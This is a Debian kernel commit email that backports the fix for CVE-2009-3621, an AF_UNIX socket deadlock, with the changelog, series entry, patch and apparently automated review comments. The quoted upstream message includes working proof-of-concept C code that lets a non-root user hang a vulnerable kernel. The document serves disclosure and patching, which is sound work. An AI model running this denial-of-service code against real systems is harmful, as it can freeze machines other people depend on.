[kernel] r14475 - in dists/lenny-security/linux-2.6/debian: . patches/bugfix/all patches/series
Dann Frazier
dannf at alioth.debian.org
Wed Oct 28 04:25:04 UTC 2009
Author: dannf
Date: Wed Oct 28 04:25:02 2009
New Revision: 14475
Log:
AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
Added:
dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
Modified:
dists/lenny-security/linux-2.6/debian/changelog
dists/lenny-security/linux-2.6/debian/patches/series/19lenny2
Modified: dists/lenny-security/linux-2.6/debian/changelog
==============================================================================
--- dists/lenny-security/linux-2.6/debian/changelog Wed Oct 28 04:23:09 2009 (r14474)
+++ dists/lenny-security/linux-2.6/debian/changelog Wed Oct 28 04:25:02 2009 (r14475)
@@ -5,6 +5,7 @@
* netlink: fix typo in initialization (CVE-2009-3612)
* drm/r128: Add test for initialisation to all ioctls that require it
(CVE-2009-3620)
+ * AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
-- dann frazier <dannf at debian.org> Tue, 27 Oct 2009 21:33:02 -0600
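Review bot: the new changelog entry matches the commit log and the patch filename, but it records only the CVE id; consider adding the upstream commit id 77238f2b942b38ab4e7f3aced44084493e4a8675 that the added patch file carries, so the backport can be traced to its origin without opening the patch.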
Added: dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
==============================================================================
--- /dev/null 00:00:00 1970 (empty, because file is newly added)
+++ dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch Wed Oct 28 04:25:02 2009 (r14475)
@@ -0,0 +1,83 @@
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675
+Author: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+Date: Sun Oct 18 23:17:37 2009 -0700
+
+ AF_UNIX: Fix deadlock on connecting to shutdown socket
+
+ I found a deadlock bug in UNIX domain socket, which makes able to DoS
+ attack against the local machine by non-root users.
+
+ How to reproduce:
+ 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
+ namespace(*), and shutdown(2) it.
+ 2. Repeat connect(2)ing to the listening socket from the other sockets
+ until the connection backlog is full-filled.
+ 3. connect(2) takes the CPU forever. If every core is taken, the
+ system hangs.
+
+ PoC code: (Run as many times as cores on SMP machines.)
+
+ int main(void)
+ {
+ int ret;
+ int csd;
+ int lsd;
+ struct sockaddr_un sun;
+
+ /* make an abstruct name address (*) */
+ memset(&sun, 0, sizeof(sun));
+ sun.sun_family = PF_UNIX;
+ sprintf(&sun.sun_path[1], "%d", getpid());
+
+ /* create the listening socket and shutdown */
+ lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+ bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+ listen(lsd, 1);
+ shutdown(lsd, SHUT_RDWR);
+
+ /* connect loop */
+ alarm(15); /* forcely exit the loop after 15 sec */
+ for (;;) {
+ csd = socket(AF_UNIX, SOCK_STREAM, 0);
+ ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+ if (-1 == ret) {
+ perror("connect()");
+ break;
+ }
+ puts("Connection OK");
+ }
+ return 0;
+ }
+
+ (*) Make sun_path[0] = 0 to use the abstruct namespace.
+ If a file-based socket is used, the system doesn't deadlock because
+ of context switches in the file system layer.
+
+ Why this happens:
+ Error checks between unix_socket_connect() and unix_wait_for_peer() are
+ inconsistent. The former calls the latter to wait until the backlog is
+ processed. Despite the latter returns without doing anything when the
+ socket is shutdown, the former doesn't check the shutdown state and
+ just retries calling the latter forever.
+
+ Patch:
+ The patch below adds shutdown check into unix_socket_connect(), so
+ connect(2) to the shutdown socket will return -ECONREFUSED.
+
+ Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+ Signed-off-by: Masanori Yoshida <masanori.yoshida.tv at hitachi.com>
+ Signed-off-by: David S. Miller <davem at davemloft.net>
+
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 51ab497..fc820cd 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1074,6 +1074,8 @@ restart:
+ err = -ECONNREFUSED;
+ if (other->sk_state != TCP_LISTEN)
+ goto out_unlock;
++ if (other->sk_shutdown & RCV_SHUTDOWN)
++ goto out_unlock;
+
+ if (unix_recvq_full(other)) {
+ err = -EAGAIN;
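Review bot: the `if (other->sk_shutdown & RCV_SHUTDOWN) goto out_unlock;` check in the af_unix.c hunk sits after `err = -ECONNREFUSED;` and before the `unix_recvq_full(other)` test, so a connect(2) to a shut-down listener now fails with ECONNREFUSED before it can reach the backlog-full path that previously spun between unix_socket_connect() and unix_wait_for_peer(); that placement is what breaks the loop, so if the context shifts on the 2.6.26 rebase the check must stay ahead of the recvq test and under the same lock. RCV_SHUTDOWN covers the SHUT_RDWR used in the reproducer as well as SHUT_RD. Minor: the embedded upstream message spells the errno "-ECONREFUSED" while the code uses ECONNREFUSED; since this file mirrors the upstream commit verbatim it should be left as is, but the Debian changelog should not copy that spelling.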
Modified: dists/lenny-security/linux-2.6/debian/patches/series/19lenny2
==============================================================================
--- dists/lenny-security/linux-2.6/debian/patches/series/19lenny2 Wed Oct 28 04:23:09 2009 (r14474)
+++ dists/lenny-security/linux-2.6/debian/patches/series/19lenny2 Wed Oct 28 04:25:02 2009 (r14475)
@@ -2,3 +2,4 @@
+ bugfix/all/random-make-get_random_int-more-random.patch
+ bugfix/all/netlink-fix-typo-in-initialization.patch
+ bugfix/all/drm+r128-Add-test-for-init-to-all-reqd-ioctls.patch
++ bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
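Review bot: the new entry is appended at the end of 19lenny2, in the same order as the changelog, and none of the other patches listed in this series (random, netlink, drm/r128) touch net/unix/af_unix.c, so there is no ordering conflict to worry about.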